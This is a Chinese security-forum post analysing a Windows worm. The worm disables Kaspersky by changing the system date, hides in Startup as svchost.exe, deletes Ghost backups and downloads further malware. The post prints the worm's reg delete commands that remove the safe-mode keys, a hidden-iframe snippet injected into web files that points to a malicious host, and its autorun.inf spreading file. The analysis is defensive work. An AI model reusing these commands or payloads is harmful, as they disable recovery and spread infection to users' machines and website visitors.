pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析
该样本程序被执行后,查询当前进程中是否存在“AVP.EXE”或含有“卡巴”字样的窗口,如存在则使用执行命令行“cmd.exe /c date 1989-12-01 ”修改系统时间,试图使其监控失效;拷贝自身到C:\Documents and Settings\All Users\「开始」菜单\程序\启动目录下重新命名为“svchost.exe”并执行;后使用批处理执行自删除。
被拷贝程序程序执行后,后台调用命令行删除安全模式相关注册表:
| Quote: | cmd /c reg delete
hkey_local_machine\system\currentcontrolset\control\safeboot\minimla /f
cmd /c reg delete
hkey_local_machine\system\currentcontrolset\control\safeboot\network /f |
|
查找窗口名或类名为如下字符的窗口,通过向其发送相关消息使其关闭退出:
遍历磁盘文件删除扩展名为“gho”的文件,使用户不能通过“ghost”恢复系统;查找磁盘中文件扩展名为“htm”,“html”,“asp”,“aspx”,“php”,“jsp”的文件,打开文件将以下代码写入,感染网页文件进行传播。
| Quote: | | <iframe src=http://sy***01.199.53dns.com/mz/005.htm width=0 ",CR,LF,"height=0></iframe> |
|
访问恶意网址“http://sy***01.199.53dns.com/mz/”读取下载列表“mm.txt”,根据列表下载病毒至%SystemRoot%\temp\目录下并执行下载的病毒。
枚举盘符在各分区和移动存储介质中释放隐藏文件“autorun.inf”以及病毒副本“svchost.exe” ,使用Windows自动播放功能来传播病毒。
其中autorun.inf文件内容如下:
| Quote: | [AutoRun]
open=svchost.exe
shell\open\command=svchost.exe
shell\open\default=1
shell\explore=资源管理器(&x)
shell\explore\command=svchost.exe |
|
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
